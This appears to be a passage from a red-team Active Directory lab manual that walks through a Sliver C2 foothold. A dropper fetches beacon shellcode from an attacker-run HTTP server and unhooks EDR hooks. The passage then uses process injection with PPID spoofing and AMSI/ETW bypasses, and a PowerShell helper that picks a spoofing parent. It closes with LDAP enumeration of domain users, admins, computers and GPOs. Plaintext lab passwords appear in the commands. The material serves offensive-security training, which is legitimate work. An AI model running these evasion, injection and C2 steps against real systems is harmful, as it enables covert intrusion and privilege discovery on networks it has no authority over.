PS C:\AD\Tools> C:\AD\Tools\NtDropper.exe 172.16.100.X dcorp-std_https.bin


[+] Stealth mode: Unhooking one function
[+] Creating new process in debug mode
[+] Found LdrLoadDllAddress address: 0x00007FFCBAD74840
[+] Setting HWBP on remote process
[+] Breakpoint Hit!
[+] Copying clean ntdll from remote process
[+] Found ntdll base address: 0x00007FFCBAD40000
[STEALTH] Function Name : NtAllocateVirtualMemory
[STEALTH] Address of Function: 0x0000019C7B2404C0
[+] Unhooked

Back on our python3/HFS web server we see the request fetching dcorp-std_https.bin.
wsluser@dcorp-studentX:/mnt/c/AD/Tools/Sliver$ sudo python3 -m http.server 80
[sudo] password for wsluser: WSLToTh3Rescue!
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.16.100.X - - [01/Jan/2024 05:10:02] "GET /dcorp-std_https.bin HTTP/1.1" 200 -

In our Sliver terminal we see a new beacon with no new detections.

List all beacons using the beacons command. To interact with a beacon, select it with the use command and its beacon ID.

Note: beacons check in periodically after a sleep interval, unlike Sliver interactive sessions, which communicate in real time.
[server] sliver > beacons
3a53f558 dcorp-std_https http(s) dcorp-studentX dcorp\studentX windows/amd64 14s 1m2s

[server] sliver > use 3a53f558

[*] Active beacon dcorp-std_https (3a53f558-9720-489c-9607-52ca462e8407)

We can start a session implant from the beacon using the interactive command to work with the host in real time, then interact with the session using sessions -i.

Note: This is different from the shell command, which spawns a shell and isn't OPSEC safe.
[server] sliver (dcorp-std_https) > interactive
[*] Using beacon's active C2 endpoint: https://172.16.100.X
[*] Tasked beacon dcorp-std_https (56cb1350)
[*] Session 44f1c601 dcorp-std_https - 172.16.100.X:61263 (dcorp-studentX) - windows/amd64 - Tue, 02 Jan 2024 04:28:12 PST

[server] sliver (dcorp-std_https) > sessions -i 44f1c601

[*] Active session dcorp-std_https (44f1c601)

We can use the armory install command to install external tools/modules, an example is shown below.

[server] sliver (dcorp-std_https) > armory install sharpup

[*] Installing alias 'SharpUp' (v0.0.1) ... done!

Analysis using Process Hacker

Analyzing the execution on dcorp-stdX using Process Hacker (found at C:\AD\Sliver Tools\processhacker-2.39\x64) we see that the Sliver beacon shellcode is injected into the taskhostw.exe process with PID 2128.

Examine the beacon's RuntimeBroker.exe process and its Modules tab to find amsi.dll loaded in the process.

Learning Objective 1
Enumerate following for the dollarcorp domain:

• Users

• Computers

• Domain Administrators

• Enterprise Administrators

Enumerating Users
Using StandIn
We begin the enumeration phase from the dcorp-stdX foothold session.

We enumerate users using StandIn via the execute-assembly command, which runs StandIn in memory with PPID spoofing.

• execute-assembly supports injection into a remote hosting process and injection into the current Sliver process (self-injection). It also offers an in-built AMSI bypass (-M) and ETW bypass (-E) when performing self-injection (-i).

• To use execute-assembly with our tools we need a suitable parent process to fork and run a child process under. We use the svchost.exe that parents our beacon process (RuntimeBroker.exe) to spawn a child process (taskhostw.exe) and inject our .NET tooling into it, so the spoofed PPID matches a legitimate relationship. In this walkthrough that svchost.exe has PID 2396 (see the ps output below).

If we want to spawn under another parent process, we can enumerate processes using the ps command as follows.
[server] sliver (dcorp-std_https) > ps -e svchost.exe

 Pid    Ppid   Owner              Arch     Executable    Session
====== ====== ================== ======== ============= =========
 692    600                                svchost.exe   -1
 756    600                                svchost.exe   -1
 896    600                                svchost.exe   -1
 904    600                                svchost.exe   -1
 996    600                                svchost.exe   -1
 1004   600                                svchost.exe   -1
 332    600                                svchost.exe   -1
 772    600                                svchost.exe   -1
 1056   600                                svchost.exe   -1
 1092   600                                svchost.exe   -1
 1432   600                                svchost.exe   -1
 1724   600                                svchost.exe   -1
 1648   600                                svchost.exe   -1
 2100   600                                svchost.exe   -1
 2124   600                                svchost.exe   -1
 2396   600    dcorp\studentX     x86_64   svchost.exe   2
 704    600                                svchost.exe   -1
 1536   600                                svchost.exe   -1

ps:
-e, --exe string filter based on executable name
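
Choosing the parent to spoof can be automated instead of being read off Process Hacker and the ps table. The following PowerShell helper is an added example (not part of the manual or of Sliver): it builds the host's process tree from WMI and ranks the svchost.exe instances in the current logon session by whether they already parent the children listed in the PPID spoofing section. The candidate child list mirrors the manual's Process Hacker observation and is an assumption.

```powershell
# Added example (not from the lab manual): pick a plausible parent for PPID spoofing from the
# live parent/child relationships on the host, the view the manual gets from Process Hacker.
function Get-ProcessTree {
    # One object per process with its parent's image name resolved (or <exited>).
    $procs = Get-CimInstance -ClassName Win32_Process
    $byPid = @{}
    foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }
    foreach ($p in $procs) {
        $parent = $byPid[[int]$p.ParentProcessId]
        [pscustomobject]@{
            Pid       = [int]$p.ProcessId
            Name      = $p.Name
            Ppid      = [int]$p.ParentProcessId
            Parent    = if ($parent) { $parent.Name } else { '<exited>' }
            SessionId = [int]$p.SessionId
        }
    }
}

function Find-SpoofParentCandidate {
    param(
        [string]$ParentImage = 'svchost.exe',
        # Children that legitimately run under svchost.exe (assumed list, per the manual's observation).
        [string[]]$ExpectedChildren = @('RuntimeBroker.exe', 'taskhostw.exe', 'sihost.exe')
    )
    $tree    = Get-ProcessTree
    $session = (Get-Process -Id $PID).SessionId   # stay inside our own logon session (ps "Session" column)

    foreach ($candidate in $tree | Where-Object { $_.Name -ieq $ParentImage -and $_.SessionId -eq $session }) {
        $children = @($tree | Where-Object { $_.Ppid -eq $candidate.Pid })
        [pscustomobject]@{
            Pid       = $candidate.Pid
            SessionId = $candidate.SessionId
            Children  = ($children.Name -join ', ')
            # A parent that already has one of the expected children makes a spoofed taskhostw.exe blend in.
            Plausible = [bool]($children | Where-Object { $ExpectedChildren -icontains $_.Name })
        }
    }
}

# Usage: Find-SpoofParentCandidate | Sort-Object Plausible -Descending | Format-Table -AutoSize
```

The same data explains the detection gap: Win32_Process (and Sysmon event 1) report the parent recorded at creation time, which is exactly the value PPID spoofing controls, so this view cannot expose spoofing. Detecting it needs telemetry that also records the real creating process, such as the kernel process ETW provider, and flags a mismatch between creator and claimed parent.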

To enumerate all users we query every user object and its properties (refer to the LDAP section above) using the --ldap option followed by the filter (&(objectCategory=person)(objectClass=user)). This filter matches objects whose objectCategory is person and whose objectClass is user, i.e. all USER objects, and returns their properties.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(&(objectCategory=person)(objectClass=user))"'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[+] LDAP search result count : 97
|_ Result limit : 50

[?] Iterating result properties

[?] Object : CN=Administrator
Path : LDAP://CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

[+] logoncount
|_ 65535
[+] codepage
|_ 0
[+] objectcategory
|_ CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

[+] description
|_ Built-in account for administering the computer/domain

[+] usnchanged
|_ 3404228

[+] instancetype
|_ 4
[+] name
|_ Administrator
[+] badpasswordtime
|_ 9/15/2022 10:57:35 AM UTC
[+] pwdlastset
|_ 2/17/2019 5:14:11 AM UTC
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_NORMAL_USER_ACCOUNT

[..................snip...................]

execute-assembly:
-t, --timeout command timeout in seconds (default: 60)
-p, --process string hosting process to inject into
-P, --ppid uint parent process id (optional) (default: 0)

StandIn:
--ldap LDAP filter, can return result collection
--filter Filter results, varies based on module
--limit Limit results, varies based on module, defaults:50

We can optionally return specific properties of the queried objects, such as samaccountname, using the --filter argument, and limit the number of results displayed using the --limit argument.

We can perform an AMSI and ETW bypass with execute-assembly using the -M and -E flags. The same command with those bypasses is shown below.

Note: The AMSI/ETW bypasses of execute-assembly can only be applied in the current process (self-injection), not in a remote process. Use the -i flag to execute within the current Sliver beacon process. To bypass AMSI/ETW in a remote process use the inject-amsi-bypass and inject-etw-bypass commands.
[server] sliver (dcorp-std_https) > execute-assembly -i -M -E -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap samaccountname=* --filter displayname'

[*] Output:
[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local
[+] LDAP search result count : 75
|_ Result limit : 50

[..................snip...................]

[?] Object : CN=Backup Operators
Path : LDAP://CN=Backup Operators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
[?] Object : CN=Cert Publishers
Path : LDAP://CN=Cert Publishers,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[?] Object : CN=Certificate Service DCOM Access
Path : LDAP://CN=Certificate Service DCOM Access,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
[?] Object : CN=ci admin
Path : LDAP://CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[+] displayname
|_ ci admin

[..................snip...................]

execute-assembly:
-i, --in-process Run in the current sliver process
-M, --amsi-bypass Bypass AMSI on Windows
-E, --etw-bypass Bypass ETW on Windows

Execution using inline-execute-assembly, which avoids the fork-and-run technique, is as follows.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 180 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(&(objectCategory=person)(objectClass=user))" --limit 100'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[+] LDAP search result count : 97
|_ Result limit : 100

[?] Iterating result properties

[?] Object : CN=Administrator
Path : LDAP://CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

[+] logoncount
|_ 65535
[+] codepage
|_ 0

[+] objectcategory
|_ CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

[+] description
|_ Built-in account for administering the computer/domain

[+] usnchanged
|_ 3404228
[+] instancetype
|_ 4
[+] name
|_ Administrator
[+] badpasswordtime
|_ 9/15/2022 10:57:35 AM UTC
[+] pwdlastset
|_ 2/17/2019 5:14:11 AM UTC
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_NORMAL_USER_ACCOUNT

[..................snip...................]

For larger .NET binaries it is advisable to use execute-assembly with fork and run rather than self-injection, to avoid crashing our own Sliver implant/beacon process. Hence for most tool execution during the lab we use execute-assembly with valid PPID spoofing.

To query LDAP for a single, specific object with StandIn we can use the --object argument. In this example we query the dcorp\administrator object by its known samaccountname and retrieve only its description and lastlogon properties using the --filter argument.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--object samaccountname=administrator --filter lastlogon,description'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[?] Object : CN=Administrator
Path : LDAP://CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

[?] Iterating object properties

|_ Applying property filter => lastlogon,description

[+] description
|_ Built-in account for administering the computer/domain
[+] lastlogon
|_ 9/16/2022 11:25:00 AM UTC

The same works with the --ldap argument; the only difference is that --ldap can query multiple objects at a time while --object operates on a single object.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap samaccountname=administrator --filter lastlogon,description'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[?] Object : CN=Administrator
Path : LDAP://CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

[?] Iterating object properties


|_ Applying property filter => lastlogon,description

[+] description
|_ Built-in account for administering the computer/domain
[+] lastlogon
|_ 9/16/2022 11:25:00 AM UTC

Analysis using Process Hacker
Analyzing the execution with Process Hacker on dcorp-stdX, we see that all execute-assembly tasks are injected via fork and run into a taskhostw.exe spawned under the svchost.exe process with PID 2396.

Using ADSearch
We can enumerate users using the --users argument of ADSearch.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/m/mnt/c/AD/Tools/ADSearch.exe' '--users'

[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/

Twitter: @tomcarver_
GitHub: @tomcarver16

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] ALL USERS:
[*] TOTAL NUMBER OF USERS: 97
[+] cn : Administrator
[+] cn : Guest
[+] cn : DefaultAccount
[+] cn : krbtgt
[+] cn : mcorp$
[+] cn : us$
[+] cn : ci admin
[+] cn : sql admin
[+] cn : web svc
[+] cn : srv admin
[+] cn : app admin
[+] cn : mgmt admin
[+] cn : svc admin

[.........snip..........]

ADSearch:
--users Enumerate and return all users from AD.

It is also possible to do this with an LDAP query using the --search argument and the (&(objectCategory=person)(objectClass=user)) filter shown above with StandIn (by default ADSearch returns the cn attribute).
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(objectCategory=person)(objectClass=user))"'

[*] Output:
[*] No domain supplied. This PCs domain will be used instead

[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 94
[+] cn : Administrator
[+] cn : Guest
[+] cn : DefaultAccount
[+] cn : krbtgt
[+] cn : ci admin
[+] cn : sql admin
[+] cn : web svc
[+] cn : srv admin
[+] cn : app admin
[+] cn : mgmt admin
[+] cn : svc admin

ADSearch:
--search Perform a custom search on the AD server.
--attributes Attributes to be returned from the results in csv.

[..................snip...................]

We can query the dcorp\administrator object using a known property such as samaccountname with the LDAP filter (samaccountname=administrator), and optionally return specific properties with the --attributes argument. Here we retrieve only the cn, logoncount and description properties.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(samaccountname=administrator)" --attributes cn,logoncount,description'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] cn : Administrator
[+] logoncount : 65535
[+] description : Built-in account for administering the computer/domain

Enumerating Computers
Using StandIn
We can enumerate computer objects using StandIn with the LDAP filter (objectCategory=computer), which matches objects whose objectCategory is computer, i.e. all COMPUTER objects. We also return only the samaccountname property using the --filter argument.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(objectCategory=computer)" --filter samaccountname'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[+] LDAP search result count : 28
|_ Result limit : 50

[?] Iterating result properties
|_ Applying property filter => samaccountname

[?] Object : CN=DCORP-DC
Path : LDAP://CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
[+] samaccountname
|_ DCORP-DC$
[?] Object : CN=DCORP-MGMT
Path : LDAP://CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
[+] samaccountname
|_ DCORP-MGMT$
[?] Object : CN=DCORP-CI
Path : LDAP://CN=DCORP-CI,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
[+] samaccountname
|_ DCORP-CI$

[.................snip..................]

Using ADSearch
We enumerate computer objects using ADSearch's in-built --computers argument. A raw LDAP query would achieve the same.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--computers'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] ALL COMPUTERS:
[*] TOTAL NUMBER OF COMPUTERS: 28
[+] cn : DCORP-DC
[+] cn : DCORP-MGMT
[+] cn : DCORP-CI
[+] cn : DCORP-MSSQL
[+] cn : DCORP-ADMINSRV
[+] cn : DCORP-APPSRV
[+] cn : DCORP-SQL1
[+] cn : DCORP-STDADM
[+] cn : DCORP-STDX

[............snip...........]

Enumerating Domain Administrators
Using StandIn
Enumerate members of the Domain Admins group using StandIn by querying the group object via a known property such as its samaccountname or distinguishedname, e.g. (samaccountname=domain admins), and return the member property with the --filter argument to list all members of the group.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--object "(samaccountname=domain admins)" --filter member'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local

[?] Object : CN=Domain Admins
Path : LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

[?] Iterating object properties


|_ Applying property filter => member

[+] member
|_ CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
|_ CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

An alternative would be to query a group for its members using the --group argument as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\S
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--group "domain a
dmins"'

[*] Output:

[…snip…]

[+] Members

[?] Path : LDAP://CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
samAccountName : Administrator
Type : SAM_USER_OBJECT
SID : S-1-5-21-719815819-3726368948-3917688648-500
[?] Path : LDAP://CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
samAccountName : svcadmin
Type : SAM_USER_OBJECT
SID : S-1-5-21-719815819-3726368948-3917688648-1118

Using ADSearch
We can enumerate members of the domain admins group using the --domain-admins argument using
ADSearch.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--domain-admins'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] ALL DOMAIN ADMINS:
[*] TOTAL NUMBER OF DOMAIN ADMINS: 2
[+] cn : Administrator
[+] cn : svc admin

To filter specific properties of the above users, use LDAP queries using the --search command and use
appropriate filters using the --attributes argument to return specific properties.

Enumerating Enterprise Administrators
Using StandIn
Enumerate the members of the Enterprise Admins group with StandIn by querying the group for its members using the --group argument. The group lives in the forest root, moneycorp.local, which we can reach over the bidirectional trust, so we specify it with --domain and supply credentials with --user/--pass. Explicit credentials avoid the Kerberos double-hop problem, where the implant's token cannot be used to authenticate onward to the parent domain's DC. Here we use the foothold credentials of studentX.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--group "enterprise admins" --domain moneycorp.local --user "studentX" --pass "JPIzbuWHdSfq9NFr"'

[*] Output:

[?] Using DC : mcorp-dc.moneycorp.local


[?] Type : Group resolution
Group : Enterprise Admins

[+] Members

[?] Path : LDAP://moneycorp.local/CN=Administrator,CN=Users,DC=moneycorp,DC=local
samAccountName : Administrator
Type : SAM_USER_OBJECT
SID : S-1-5-21-335606122-960912869-3279953914-500

StandIn:
--domain Domain name
--user User name
--pass Password
--group Target group

Using ADSearch
Enumerate members of the Enterprise Admins group using ADSearch by using the LDAP filter:
(&(objectCategory=group)(cn=enterprise admins)). This LDAP query filters for objects with a matching
Object Category property as group and a specific cn property as enterprise admins. We filter for the cn,
member properties of the object using the --attributes filter option.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(objectCategory=group)(cn=enterprise admins))" --attributes cn,member --domain moneycorp.local'

[*] Output:

[*] LDAP://DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] cn : Enterprise Admins
[+] member : CN=Administrator,CN=Users,DC=moneycorp,DC=local

ADSearch:
--domain The domain controller we are connecting to in the FQDN format
--username Attempts to authenticate to AD with the given username.
--password Attempts to authenticate to AD with the given password.

Learning Objective 2
Enumerate following for the dollarcorp domain:

• List all the OUs

• List all the computers in the StudentMachines OU

• List the GPOs

• Enumerate GPO applied on the StudentMachines OU

List all the OUs


Using StandIn
We can enumerate all OUs with StandIn using the LDAP query (objectCategory=organizationalUnit), which matches every object whose objectCategory is organizationalUnit. We restrict the output with --filter so that only the name property is returned.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(objectCategory=organizationalUnit)" --filter name'

[*] Output:
[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local
[+] LDAP search result count : 4
|_ Result limit : 50

[?] Iterating result properties


|_ Applying property filter => name

[?] Object : OU=Domain Controllers
Path : LDAP://OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
[+] name
|_ Domain Controllers

[?] Object : OU=Applocked
Path : LDAP://OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
[+] name
|_ Applocked

[?] Object : OU=Servers
Path : LDAP://OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
[+] name
|_ Servers

[?] Object : OU=StudentMachines
Path : LDAP://OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
[+] name
|_ StudentMachines

AlteredSecurity Attacking and Defending Active Directory 40


Using ADSearch
We can enumerate all OUs with ADSearch using the same LDAP query, (objectCategory=organizationalUnit), and return only the name property with the --attributes argument.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(objectCategory=organizationalUnit)" --attributes name'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 4
[+] name : Domain Controllers
[+] name : Applocked
[+] name : Servers
[+] name : StudentMachines

Enumerate DistinguishedName for StudentMachines OU
Using StandIn
With StandIn, get the distinguished name of the StudentMachines OU using the LDAP query (OU=StudentMachines), or equivalently (&(objectCategory=organizationalUnit)(|(name=StudentMachines))). Use --filter to return only the distinguishedname property of the matched object.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(OU=StudentMachines)" --filter distinguishedname'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[+] LDAP search result count : 1
|_ Result limit : 50

[?] Iterating result properties


|_ Applying property filter => distinguishedname

[?] Object : OU=StudentMachines
Path : LDAP://OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
[+] distinguishedname
|_ OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local

Using ADSearch
Using ADSearch get the distinguished name of the StudentMachines OU using the LDAP query:
(OU=StudentMachines). Use the --attributes argument to retrieve only the distinguishedname property.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(OU=StudentMachines)" --attributes distinguishedname'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 1
[+] distinguishedname : OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local

List all the computers in the StudentMachines OU
Using DSQuery
ADSearch and StandIn do not let us set a custom search base (a distinguishedname from which the search starts), so for this task we use the C# port of dsquery instead.

Find the source for dsquery.cs here. dsquery can also perform all of the standard enumeration that StandIn and ADSearch do, using LDAP queries.

Use dsquery to perform a custom search over the StudentMachines OU by supplying its distinguishedname as the Search Base/Start Node, and use the -filter argument to run an LDAP query for all computers within that OU.

Note: here -filter takes an LDAP filter, not a property name as with StandIn's --filter.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/dsquery.exe' '* "OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local" -filter "(objectCategory=computer)"'
[*] Output:
Records Found: 1

accountexpires: 9223372036854775807
adspath: LDAP://CN=DCORP-STDADM,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
badpasswordtime: 132426575463687563

badpwdcount: 0
cn: DCORP-STDADM
codepage: 0
countrycode: 0
distinguishedname: CN=DCORP-STDADM,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
dnshostname: dcorp-stdadm.dollarcorp.moneycorp.local
dscorepropagationdata: 5/3/2020 9:04:05 AM
dscorepropagationdata: 2/26/2019 8:38:38 AM
dscorepropagationdata: 1/1/1601 12:00:01 AM
instancetype: 4
iscriticalsystemobject: False
lastlogoff: 0
lastlogon: 133080561744848387
lastlogontimestamp: 133080301217800681
localpolicyflags: 0
logoncount: 267
msds-supportedencryptiontypes: 28
name: DCORP-STDADM
objectcategory: CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
objectclass: top

objectclass: person
objectclass: organizationalPerson
objectclass: user
objectclass: computer
objectguid: {D2FD66CD-C854-4745-BA5C-0FA2D6298A56}
objectsid: S-1-5-21-1874506631-3219952063-538504511-2149
operatingsystem: Windows Server 2016 Standard
operatingsystemversion: 10.0 (14393)
primarygroupid: 515
pwdlastset: 132773719811689017
samaccountname: DCORP-STDADM$
samaccounttype: 805306369
serviceprincipalname: WSMAN/dcorp-stdadm
serviceprincipalname: WSMAN/dcorp-stdadm.dollarcorp.moneycorp.local
serviceprincipalname: TERMSRV/DCORP-STDADM
serviceprincipalname: TERMSRV/dcorp-stdadm.dollarcorp.moneycorp.local
serviceprincipalname: RestrictedKrbHost/DCORP-STDADM
serviceprincipalname: HOST/DCORP-STDADM
serviceprincipalname: RestrictedKrbHost/dcorp-stdadm.dollarcorp.moneycorp.local
serviceprincipalname: HOST/dcorp-stdadm.dollarcorp.moneycorp.local
useraccountcontrol: 4096
usnchanged: 3404189
usncreated: 117829
whenchanged: 9/19/2022 3:02:01 AM
whencreated: 2/26/2019 8:37:54 AM

DONE

List the GPOs
Using StandIn
For the next task, list all GPOs with StandIn, either with its --gpo option or with the LDAP query (objectCategory=groupPolicyContainer), which matches every Group Policy container object. Use --filter to return only the displayname property.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(objectCategory=groupPolicyContainer)" --filter displayname'

[*] Output:

[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local


[+] LDAP search result count : 5
|_ Result limit : 50

[?] Iterating result properties


|_ Applying property filter => displayname

[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
[+] displayname
|_ Default Domain Policy

[?] Object : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}
Path : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
[+] displayname
|_ Default Domain Controllers Policy

[?] Object : CN={211A25B2-03AD-4E5E-9C6A-AFEFE66EFB2D}
Path : LDAP://CN={211A25B2-03AD-4E5E-9C6A-AFEFE66EFB2D},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
[+] displayname
|_ Applocker

[..................snip................]

Using ADSearch
We can use ADSearch to list all GPOs with the LDAP query: (objectCategory=groupPolicyContainer). Use
the --attributes argument to only select the displayname property.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(objectCategory=groupPolicyContainer)" --attributes displayname'

[*] Output:

[*] No domain supplied. This PCs domain will be used instead


[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 5
[+] displayname : Default Domain Policy
[+] displayname : Default Domain Controllers Policy
[+] displayname : Applocker
[+] displayname : Servers
[+] displayname : Students

Enumerate GPOs applied on the StudentMachines OU
Using StandIn
To enumerate the GPOs applied on the StudentMachines OU, we first need the OU's gplink attribute, which lists the GPOs linked to it. With StandIn, query the OU with the filter (OU=StudentMachines) and select only the gplink property using --filter, as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(OU=StudentMachines)" --filter gplink'

[*] Output:
[?] Using DC : dcorp-dc.dollarcorp.moneycorp.local
[+] LDAP search result count : 1
|_ Result limit : 50

[?] Iterating result properties


|_ Applying property filter => gplink

[?] Object : OU=StudentMachines
Path : LDAP://OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
[+] gplink
|_ [LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies, cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]

